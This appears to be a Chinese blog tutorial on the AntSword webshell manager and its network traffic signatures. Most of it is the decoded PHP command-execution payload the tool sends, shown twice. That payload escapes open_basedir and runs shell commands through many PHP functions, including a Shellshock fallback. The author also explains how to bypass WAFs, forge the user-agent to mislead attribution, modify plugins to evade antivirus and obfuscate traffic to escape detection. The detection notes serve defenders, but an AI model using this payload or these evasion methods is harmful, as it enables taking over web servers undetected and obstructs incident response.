蚁剑的相关使用以及流量分析
使用
添加/编辑数据
页面空白处右键,选择添加数据。输入木马地址及密码,添加保存,或者选定想要修改的数据,右键修改数据
在添加和修改时都可以进行编码,修改编码相当于连接时修改了连接方式,这样就可以绕过WAF
修改添加时的请求包,请求体,可误导溯源方向,主要修改user-agen头,如果使用蚁剑连接,请求头非常明显,user-agent:antSword,这个时候想要攻击不被明显的发现就要修改这个请求头
虚拟终端
选择数据连接,右键虚拟终端,可以直接进入该数据服务器命令行,执行命令
文件管理
文件管理,直接查看服务器上的文件
数据操作
可以连接网站所使用的数据库,并执行sql语句
加载插件
使用再插件市场中已经安装好的插件
插件市场
蚁剑插件需要开启全局代理,或者配置VPN访问迅速
插件市场中,remote是未安装,local是已经安装的
蚁剑中的插件上传较久,容易被防护发现,可以查看插件的源码,通过修改一些内容,免杀
流量分析
流量特征
1、默认的 user-agent 请求头是 antsword ,content-Length有urlencode字段
2、蚁剑的正文内容用URL加密
3、正文解密后流量最中明显的特征为ini_set("display_errors","0");
4、响应包明文,响应体的内容为base64编码加混淆字符,格式为:随机数 结果 随机数
流量分析
在使用wireshark进行分析时,可以过滤http协议,并且过滤post方式,蚁剑采用post方式进行请求,
追踪http流,可以看到请求内容
default编码
以post的方式传入了三个参数,并取参数值的第三个字符开始的字符串进行base64解码。
123=@ini_set("display_errors", "0");
@set_time_limit(0);
//获取和处理open_basedir
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
//创建临时目录
foreach($oparr as $item) {
if(!@is_writable($item)) {
continue;
}
;
$tmdir=$item."/.4a400f19";
@mkdir($tmdir);
if(!@file_exists($tmdir)) {
continue;
}
$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\\\|\//",$tmdir);
for ($i=0;$i @chdir(".."); } ; @ini_set("open_basedir","/"); @rmdir($tmdir); break; } ; } ; ; function asenc($out) { return $out; } ; function asoutput() { $output=ob_get_contents(); ob_end_clean(); echo "9863"."22fe9"; echo @asenc($output); echo "bfb"."3ba6"; } ob_start(); try { //执行命令,接收参数 $p=base64_decode(substr($_POST["mb15ce4fadb25d"],2)); //正确的内容是这个字符串去掉前两位 $s=base64_decode(substr($_POST["s7c079558ec28f"],2)); $envstr=@base64_decode(substr($_POST["ye516631e211db"],2)); $d=dirname($_SERVER["SCRIPT_FILENAME"]); $c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\""; if(substr($d,0,1)=="/") { @putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"); } else { @putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;"); } if(!empty($envstr)) { $envarr=explode("|||asline|||", $envstr); foreach($envarr as $v) { if (!empty($v)) { @putenv(str_replace("|||askey|||", "=", $v)); } } } $r="{$p} {$c}"; function fe($f) { $d=explode(",",@ini_get("disable_functions")); if(empty($d)) { $d=array(); } else { $d=array_map('trim',array_map('strtolower',$d)); } return(function_exists($f)&&is_callable($f)&&!in_array($f,$d)); } ; function runshellshock($d, $c) { if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) { if (strstr(readlink("/bin/sh"), "bash") != FALSE) { $tmp = tempnam(sys_get_temp_dir(), 'as'); putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1"); if (fe('error_log')) { error_log("a", 1); } else { mail("a@127.0.0.1", "", "", "-bv"); } } else { return False; } $output = @file_get_contents($tmp); @unlink($tmp); if ($output != "") { print($output); return True; } } return False; } ; function runcmd($c) { $ret=0; $d=dirname($_SERVER["SCRIPT_FILENAME"]); if(fe('system')) { @system($c,$ret); } elseif(fe('passthru')) { @passthru($c,$ret); } elseif(fe('shell_exec')) { print(@shell_exec($c)); } elseif(fe('exec')) { @exec($c,$o,$ret); print(join(" ",$o)); } elseif(fe('popen')) { $fp=@popen($c,'r'); while(!@feof($fp)) { print(@fgets($fp,2048)); } @pclose($fp); } elseif(fe('proc_open')) { $p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); while(!@feof($io[1])) { print(@fgets($io[1],2048)); } while(!@feof($io[2])) { print(@fgets($io[2],2048)); } @fclose($io[1]); @fclose($io[2]); @proc_close($p); } elseif(fe('antsystem')) { @antsystem($c); } elseif(runshellshock($d, $c)) { return $ret; } elseif(substr($d,0,1)!="/" && @class_exists("COM")) { $w=new COM('WScript.shell'); $e=$w->exec($c); $so=$e->StdOut(); $ret.=$so->ReadAll(); $se=$e->StdErr(); $ret.=$se->ReadAll(); print($ret); } else { $ret = 127; } return $ret; } ; $ret=@runcmd($r." 2>&1"); print ($ret!=0)?"ret={$ret}":""; ; } catch(Exception $e) { echo "ERROR://".$e->getMessage(); } ; asoutput(); die(); &mb15ce4fadb25d=qML2Jpbi9zaA==&s7c079558ec28f=wjY2QgIi92YXIvd3d3L2h0bWwvdXBsb2FkIjtwd2Q7ZWNobyBlMjI1MDUwOThjYWU7cHdkO2VjaG8gYmVjMWU=&ye516631e211db=JO &mb15ce4fadb25d=qML2Jpbi9zaA== &s7c079558ec28f=wjY2QgIi92YXIvd3d3L2h0bWwvdXBsb2FkIjtwd2Q7ZWNobyBlMjI1MDUwOThjYWU7cHdkO2VjaG8gYmVjMWU=&ye516631e211db=JO 将mb15ce4fadb25d的值qML2Jpbi9zaA== 去除前两位,进行base64解码后为/bin/sh 将s7c079558ec28f的值wjY2QgIi92YXIvd3d3L2h0bWwvdXBsb2FkIjtwd2Q7ZWNobyBlMjI1MDUwOThjYWU7cHdkO2VjaG8gYmVjMWU=&ye516631e211db=JO去除前两位,进行base64解码后为cd "/var/www/html/upload";pwd;echo e22505098cae;pwd;echo bec1e base64编码 随机生成一个参数传入 base64 编码后的代码,密码参数的值是通过 POST 获取随机参数的值然后进行 base64 解码后使用 eval 执行。我们把参数值进行base64解码就可以得到执行的代码。 @ini_set("display_errors", "0"); @set_time_limit(0); $opdir=@ini_get("open_basedir"); if($opdir) { $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]); $oparr=preg_split("/;|:/",$opdir); @array_push($oparr,$ocwd,sys_get_temp_dir()); foreach($oparr as $item) { if(!@is_writable($item)) { continue; } ; $tmdir=$item."/.6a33b73913"; @mkdir($tmdir); if(!@file_exists($tmdir)) { continue; } @chdir($tmdir); @ini_set("open_basedir", ".."); $cntarr=@preg_split("/\\\\|\//",$tmdir); for ($i=0;$i @chdir(".."); } ; @ini_set("open_basedir","/"); @rmdir($tmdir); break; } ; } ; ; function asenc($out) { return @base64_encode($out); } ; function asoutput() { $output=ob_get_contents(); ob_end_clean(); echo "95"."44e"; echo @asenc($output); echo "1911"."b6c9"; } ob_start(); try { $p=base64_decode(substr($_POST["ka199f64875418"],2)); $s=base64_decode(substr($_POST["n7573f80f63f59"],2)); $envstr=@base64_decode(substr($_POST["w2b059d24e126c"],2)); $d=dirname($_SERVER["SCRIPT_FILENAME"]); $c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\""; if(substr($d,0,1)=="/") { @putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"); } else { @putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;"); } if(!empty($envstr)) { $envarr=explode("|||asline|||", $envstr); foreach($envarr as $v) { if (!empty($v)) { @putenv(str_replace("|||askey|||", "=", $v)); } } } $r="{$p} {$c}"; function fe($f) { $d=explode(",",@ini_get("disable_functions")); if(empty($d)) { $d=array(); } else { $d=array_map('trim',array_map('strtolower',$d)); } return(function_exists($f)&&is_callable($f)&&!in_array($f,$d)); } ; function runshellshock($d, $c) { if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) { if (strstr(readlink("/bin/sh"), "bash") != FALSE) { $tmp = tempnam(sys_get_temp_dir(), 'as'); putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1"); if (fe('error_log')) { error_log("a", 1); } else { mail("a@127.0.0.1", "", "", "-bv"); } } else { return False; } $output = @file_get_contents($tmp); @unlink($tmp); if ($output != "") { print($output); return True; } } return False; } ; function runcmd($c) { $ret=0; $d=dirname($_SERVER["SCRIPT_FILENAME"]); if(fe('system')) { @system($c,$ret); } elseif(fe('passthru')) { @passthru($c,$ret); } elseif(fe('shell_exec')) { print(@shell_exec($c)); } elseif(fe('exec')) { @exec($c,$o,$ret); print(join(" ",$o)); } elseif(fe('popen')) { $fp=@popen($c,'r'); while(!@feof($fp)) { print(@fgets($fp,2048)); } @pclose($fp); } elseif(fe('proc_open')) { $p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); while(!@feof($io[1])) { print(@fgets($io[1],2048)); } while(!@feof($io[2])) { print(@fgets($io[2],2048)); } @fclose($io[1]); @fclose($io[2]); @proc_close($p); } elseif(fe('antsystem')) { @antsystem($c); } elseif(runshellshock($d, $c)) { return $ret; } elseif(substr($d,0,1)!="/" && @class_exists("COM")) { $w=new COM('WScript.shell'); $e=$w->exec($c); $so=$e->StdOut(); $ret.=$so->ReadAll(); $se=$e->StdErr(); $ret.=$se->ReadAll(); print($ret); } else { $ret = 127; } return $ret; } ; $ret=@runcmd($r." 2>&1"); print ($ret!=0)?"ret={$ret}":""; ; } catch(Exception $e) { echo "ERROR://".$e->getMessage(); } ; asoutput(); die(); 分析如上,通过代码查看使用什么方式,逆推进行解码 base64的蚁剑响应包中返回的数据使用base64编码。蚁剑的返回的数据采用base64编码时有点不一样,即返回的数据格式为:随机数 编码后数据 随机数 由于采用的是base64编码,所以=后面的是插入的随机数 因此这里可以尝试把=前面的字符串放到base64在线解码器,逐个地删除开头的字符进行解码测试,就可以得到解码后的数据 chr编码 chr编码就是把字符转换成了CHR(ASCII码),使用chr编码的时候,使用了 @eval()函数,对函数内的每一个字符进行了chr编码,写个脚本解码就可以得到字符串内容。 向上面一样分析解码后的代码 chr16编码 chr16编码与chr编码查不多,不同的地方在于chr编码中的ASCII值是十进制,chr16编码中的ASCII值是十六进制 rot13编码和解码 POST请求中rot13编码方式,也是使用了@eval()函数,然后对post传的传输进行了rot13编码 对请求体进行URL解码和代码格式化后,rot13编码的参数是一个函数。 想要更好地绕过流量分析检测可以加入混淆代码、改造编解码器进行混淆流量包内容